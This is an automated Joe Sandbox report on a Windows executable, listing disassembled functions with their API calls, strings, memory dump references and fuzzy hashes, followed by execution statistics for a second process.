Function 00007FF7E1DEDB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DEDBAF
WideCharToMultiByte.KERNEL32 ref: 00007FF7E1DEDC81
GetLastError.KERNEL32 ref: 00007FF7E1DEDCA4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DEDCD6

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
Instruction ID: 706e35900fcf556b737d81fecc64af3ddb52d6c47dea488a8929b6a0d9e4d5f5
Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
Instruction Fuzzy Hash: 4941A731E08A4246FB69EF109142379E2A0EF94BD1F94E132DA4D86AD9DFBCD4518722

Function 00007FF7E1DC3980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32 ref: 00007FF7E1DC39BD
MoveFileW.KERNEL32 ref: 00007FF7E1DC3A34
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC3AEB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC3AF1

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: FileMove_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3823481717-0
Opcode ID: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
Instruction ID: 767bdac7a5adcc342b480e60783108169775250cf152fc4dcf10788f8a022523
Opcode Fuzzy Hash: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
Instruction Fuzzy Hash: 1A41F262F1075184FF00EB79E8862AD6371FF44BA8B805632DE1D57A99DFB8C051C351

Function 00007FF7E1DF0B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DEC45B), ref: 00007FF7E1DF0B91
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DEC45B), ref: 00007FF7E1DF0BF3
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DEC45B), ref: 00007FF7E1DF0C2D
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DEC45B), ref: 00007FF7E1DF0C57

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction ID: 9c56179504854c7e90732f523115655c3bab9f77c9441f0dec9195d283ca5c34
Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction Fuzzy Hash: E421A731F18B5581E724EF11644122DF6A5FB5CBD0B884136DE8E63BA8DF7CE6628311

Function 00007FF7E1DED440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7E1DE7F28,?,?,?,00007FF7E1DE9D35), ref: 00007FF7E1DED44A
SetLastError.KERNEL32(?,?,?,00007FF7E1DE7F28,?,?,?,00007FF7E1DE9D35), ref: 00007FF7E1DED4B2
SetLastError.KERNEL32(?,?,?,00007FF7E1DE7F28,?,?,?,00007FF7E1DE9D35), ref: 00007FF7E1DED4C8
abort.LIBCMT ref: 00007FF7E1DED4CE

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
Instruction ID: 0ffdd9087d1fabada86ad231bf4e63a72f1ca3181ba29e86cce98791c6e22b66
Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
Instruction Fuzzy Hash: 1F01C014F08A0202FB1CF73065173B892915F54792FC4943AE81E827DAEDBCB8418233

Function 00007FF7E1DD8590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7E1DD8598
GetDeviceCaps.GDI32 ref: 00007FF7E1DD85AE
GetDeviceCaps.GDI32 ref: 00007FF7E1DD85C2
ReleaseDC.USER32 ref: 00007FF7E1DD85D3

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction ID: 7513e4d2fa8874171c5d334cfbc1ccd8a10605ae3c819ebf5ecd197a167234bc
Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction Fuzzy Hash: 37E01260F0970282FF097B71685A336E191AF48B43F89447BF85F46350DD7CA195C721

Function 00007FF7E1DBE34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBE549

Strings

DXGIDebug.dll, xrefs: 00007FF7E1DBE35A

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: DXGIDebug.dll
API String ID: 3668304517-540382549
Opcode ID: af41f5b367367adcbbc9fbea96428c46d5ee0daf519fd66926152a8cf2950bdf
Instruction ID: f911701dd195cd24e5758e08c03c597e6cca24382954c0ea0e0a6114e475b4b7
Opcode Fuzzy Hash: af41f5b367367adcbbc9fbea96428c46d5ee0daf519fd66926152a8cf2950bdf
Instruction Fuzzy Hash: F071CD72A14B8192EB14DB25E8413ADB3A8FB54794F804636DBAD03B99DFBCE061C340

Function 00007FF7E1DEE1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DEE237

Strings

e+000, xrefs: 00007FF7E1DEE2DF
gfff, xrefs: 00007FF7E1DEE362

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
Instruction ID: 7c1bb2ccc3b92dbaf17dce2da81fd940d9d11f2b1cdeb77d2e1e2293d970ce37
Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
Instruction Fuzzy Hash: 70512562F187C14AE729DF359842369AB95EB80B91F88D232C69C87BD6CF7CD444C712

Function 00007FF7E1DC9408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DC95A8: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E1DC95E6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC959C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC95A2

Strings

SIZE, xrefs: 00007FF7E1DC9443

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$swprintf
String ID: SIZE
API String ID: 449872665-3243624926
Opcode ID: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
Instruction ID: ffccf91a071f7b42abe1e836dbd6bc24155ebc6240ddb4dc0b3042b671c0705e
Opcode Fuzzy Hash: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
Instruction Fuzzy Hash: E941D772E2864285EF14EB14E4423BDE350EF957A0F904233FA9E426D5EEBCE541C751

Function 00007FF7E1DEC2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DEC2EA
GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF7E1DE2CD5), ref: 00007FF7E1DEC30B

Strings

C:\Users\user\Desktop\KR6CT3hIxT.exe, xrefs: 00007FF7E1DEC2F9

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\KR6CT3hIxT.exe
API String ID: 3307058713-1167482243
Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
Instruction ID: cdb5cb4d115a2be8baa837614d78e3aa7e0c73cd0bf8e383feebf0e9fe74e740
Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
Instruction Fuzzy Hash: 4441B536E08A5285E718EF21A8423BCB794EF447D5BC58037E94E87B45DEBDE541C322

Function 00007FF7E1DD9B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DB255C: GetDlgItem.USER32 ref: 00007FF7E1DB25AC
Part of subcall function 00007FF7E1DB255C: SetDlgItemTextW.USER32 ref: 00007FF7E1DB25C8

EndDialog.USER32 ref: 00007FF7E1DD9C24
SetDlgItemTextW.USER32 ref: 00007FF7E1DD9CAA

Strings

ASKNEXTVOL, xrefs: 00007FF7E1DD9B72

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Item$Text$Dialog
String ID: ASKNEXTVOL
API String ID: 2638039312-3402441367
Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
Instruction ID: 6a4d37c20f4b6a7b0134cedd625774eb0c20e1d146a5cfd4be90bb21ca9af63d
Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
Instruction Fuzzy Hash: 2941A122F0864281EB14FB15E4523BAA3A0BF86BC5F940137EE4E07795CEBDE4458362

Function 00007FF7E1DC9638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E1DC96EA

Part of subcall function 00007FF7E1DD0F68: WideCharToMultiByte.KERNEL32 ref: 00007FF7E1DD0F99

Strings

$%s, xrefs: 00007FF7E1DC96D7
@%s, xrefs: 00007FF7E1DC96CE

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ByteCharMultiWide_snwprintf
String ID: $%s$@%s
API String ID: 2650857296-834177443
Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction ID: 82d4eaf64b201a23777515305fe3df26d966a429092c1e9ef1354ddcfad51859
Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction Fuzzy Hash: 1131E272B19A4685EF14EF26E4423E9A3A0FB44784F801037EE4E17799EE7CE506C791

Function 00007FF7E1DEEB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7E1DEEB76
GetFileType.KERNEL32 ref: 00007FF7E1DEEB8C

Strings

@, xrefs: 00007FF7E1DEEBB7

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
Instruction ID: 0b9affaea6f44c70b12840dd2a3aa20b3704e7dc719be61e743c943cafd53e92
Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
Instruction Fuzzy Hash: 9D21E522E08A9240EF68DB249491238B659EB45775FA84337D66F477D4CFBCD881C372

Function 00007FF7E1DE4078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E1DE1D3E), ref: 00007FF7E1DE40BC
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E1DE1D3E), ref: 00007FF7E1DE4102

Strings

csm, xrefs: 00007FF7E1DE40EF

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction ID: 72b8a1de1f13aae0820d4ba2a73cd95ffa61bc4f0908016b226f376bda28c687
Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction Fuzzy Hash: 32114F32A08B8182EB25DF15E440269BBE1FB88B94F588232EF8D47768DF7CD565C701

Function 00007FF7E1DCEA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E1DCE95F,?,?,?,00007FF7E1DC463A,?,?,?), ref: 00007FF7E1DCEA63
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E1DCE95F,?,?,?,00007FF7E1DC463A,?,?,?), ref: 00007FF7E1DCEA6E

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF7E1DCEA78

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1211598281-2248577382
Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
Instruction ID: 027bd721f9e1daf279f1e8d9761d5f568871db61bcbe594021abfb1f4ae077e7
Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
Instruction Fuzzy Hash: 04E0E561E1984291E700F7249C43ABDA2117FA8760FD44332E03E811E59EBCAAA9C223

Function 00007FF7E1DCA43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7E1DCA447
FindResourceW.KERNEL32 ref: 00007FF7E1DCA45D

Strings

RTL, xrefs: 00007FF7E1DCA453

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
Instruction ID: e30934c32e1ed61768c9c4bb56e56e2c19264b7ced6ec8983ebf864599598ea2
Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
Instruction Fuzzy Hash: 2ED01251F0960141FF19A761944637492505B1CB41F84413AC80E06354EEBC91E4C766

Analysis Process: 4.exePID: 7208, Parent PID: 6108COMMON

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.7%
Total number of Nodes:	1570
Total number of Limit Nodes:	39

Executed Functions

Function 00B7F05C Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 202
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B71B83: GetModuleHandleW.KERNEL32(kernel32), ref: 00B71B9C
Part of subcall function 00B71B83: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B71BAE
Part of subcall function 00B71B83: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B71BDF

Part of subcall function 00B7B65D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B7B665

Part of subcall function 00B7BD1B: OleInitialize.OLE32(00000000), ref: 00B7BD34
Part of subcall function 00B7BD1B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B7BD6B
Part of subcall function 00B7BD1B: SHGetMalloc.SHELL32(00BAA460), ref: 00B7BD75

GetCommandLineW.KERNEL32 ref: 00B7F09B
